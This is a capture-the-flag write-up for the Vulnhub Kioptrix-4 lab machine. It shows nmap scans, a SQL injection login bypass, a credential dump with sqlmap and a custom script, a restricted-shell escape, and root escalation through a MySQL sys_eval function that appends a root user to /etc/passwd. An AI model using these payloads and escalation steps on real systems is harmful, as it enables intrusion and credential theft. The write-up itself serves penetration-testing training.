Nmap
Port 80
Blind SQL Injection
SQLMap
Exploitation
Post exploitation
Privilege escalation: user to user
Enumeration
Linpeas
Exploitation
Welcome to the Kioptrix-4 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Kioptrix-4
tags: Vulnhub
Easy
Linux
OSCP
Platform: Vulnhub
Difficult: Easy
S.O.: Linux
Link: Click here
Kioptrix: Level 1.3 (#4)
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T4 -p- 172.20.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:24 CEST
Nmap scan report for 172.20.10.9
Host is up (0.0011s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 22.53 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,80,139,445 172.20.10.9
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 14:25 CEST
Nmap scan report for 172.20.10.9
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 4h00m00s, deviation: 2h49m42s, median: 2h00m00s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2021-07-01T10:25:28-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 172.20.10.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.32 seconds
Port 80
On the website of port 80 we find an access form. Trying to do SQL injection with the classic payload 'OR' 1 '=' 1
we see that we can access it even though it reports an error.
Blind SQL Injection
As I am completing this box as training for the OSCP and Nmap is not allowed in the exam, I have written a script to be able to do the exploitation.
$ python3 blindSQLinjector.py -u http://172.20.10.9/checklogin.php -f 'myusername' -f 'mypassword' -p mypassword -H '{"Content-Type": "application/x-www-form-urlencoded","Cookie": "PHPSESSID=52757c941a411bfc3df3bf45c1c2e406"}' -e 'Wrong Username'
__________________________________________________________________________
| _ _ _ _ _____ ____ _ _____ _ _ |
| | | | (_) | |/ ____|/ __ \| | |_ _| (_) | | |
| | |__ | |_ _ __ __| | (___ | | | | | | | _ __ _ ___ ___| |_ |
| | _ \| | | ˇ_ \ / _ |\___ \| | | | | | | | ˇ_ \| |/ _ \/ __| __| |
| | |_) | | | | | | (_| |____) | |__| | |____ _| |_| | | | | __/ (__| |_ |
| |_.__/|_|_|_| |_|\__,_|_____/ \___\_\______|_____|_| |_| |\___|\___|\__| |
| _/ | |
| Made by X4v1l0k |__/ |
|__________________________________________________________________________|
+---------------------------------------+
| Database: members | Table: members |
+----+----------+-----------------------+
| id | username | password |
+----+----------+-----------------------+
| 1 | john | MyNameIsJohn |
| 2 | robert | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
Anyway, so that everyone can see how to do it with SQLMap, here I put it!
SQLMap
$ sqlmap -u http://172.20.10.9/checklogin.php --data="myusername=admin&mypassword=admin5&Submit=Login" -D members -T members --dump
___
__H__
___ ___[,]_____ ___ ___ {1.5.2#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:33:24 /2021-07-01/
[21:33:25] [INFO] resuming back-end DBMS 'mysql'
[21:33:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: myusername=HMFmOXVY&mypassword=-3789' OR 1396=1396#&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: myusername=HMFmOXVY&mypassword=v2W!k6n!K5' AND (SELECT 7971 FROM (SELECT(SLEEP(5)))ywLP)-- BXgs&Submit=Login
---
[21:33:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[21:33:25] [INFO] fetching columns for table 'members' in database 'members'
[21:33:25] [INFO] resumed: 3
[21:33:25] [INFO] resumed: id
[21:33:25] [INFO] resumed: username
[21:33:25] [INFO] resumed: password
[21:33:25] [INFO] fetching entries for table 'members' in database 'members'
[21:33:25] [INFO] fetching number of entries for table 'members' in database 'members'
[21:33:25] [INFO] resumed: 2
[21:33:25] [INFO] resumed: 1
[21:33:25] [INFO] resumed: MyNameIsJohn
[21:33:25] [INFO] resumed: john
[21:33:25] [INFO] resumed: 2
[21:33:25] [INFO] resumed: ADGAdsafdfwt4gadfga==
[21:33:25] [INFO] resumed: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password | username |
+----+-----------------------+----------+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+----+-----------------------+----------+
[21:33:25] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/172.20.10.9/dump/members/members.csv'
[21:33:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.20.10.9'
[*] ending @ 21:33:25 /2021-07-01/
Exploitation
Now that we have the passwords of the users, we tested it with SSH and we managed to access but, we are in a restricted shell.
$ ssh john@172.20.10.9
john@172.20.10.9's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd clear echo exit help ll lpath ls
john:~$
Reading on the internet how to escape and trying various methods, we managed to escape using the echo
command and executing python os.system('/bin/bash)
.
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$
Post exploitation
Privilege escalation: user to user
Enumeration
Linpeas
[+] MySQL connection using root/NOPASS ................. Yes
[+] Searching mysql credentials and exec
Found lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');
Exploitation
Linpeas tells us that we can access MySQL as root without a password and that the lib_mysqludf_sys.so
library is loaded so we can execute system commands as root from MySQL using the sys_eval();
function.
john@Kioptrix4:~$ mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 77819
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| members |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> SELECT sys_eval('id');
ERROR 1305 (42000): FUNCTION mysql.sys_eval does not exist
As we can see, the function is not created but we can create it and thus be able to use it.
mysql> CREATE FUNCTION sys_eval RETURNS INT SONAME 'lib_mysqludf_sys.so';
Query OK, 0 rows affected (0.00 sec)
mysql> SELECT sys_eval('id');
+----------------+
| sys_eval('id') |
+----------------+
| NULL |
+----------------+
1 row in set (0.01 sec)
Cool! Now if we can use it, we are going to inject a user with root privileges in the /etc/passwd
file.
mysql> select sys_eval('echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| sys_eval('echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 146120912 |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
And now we should be able to authenticate with the injected user and we would be root!
john@Kioptrix4:~$ su x4v1l0k
Password:
Failed to add entry for user x4v1l0k.
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john#
And that have been all!
I have enjoyed making this box as I have never exploited a blind SQL injection manually before. And thanks to this box, now I have my own script to exploit them!! :D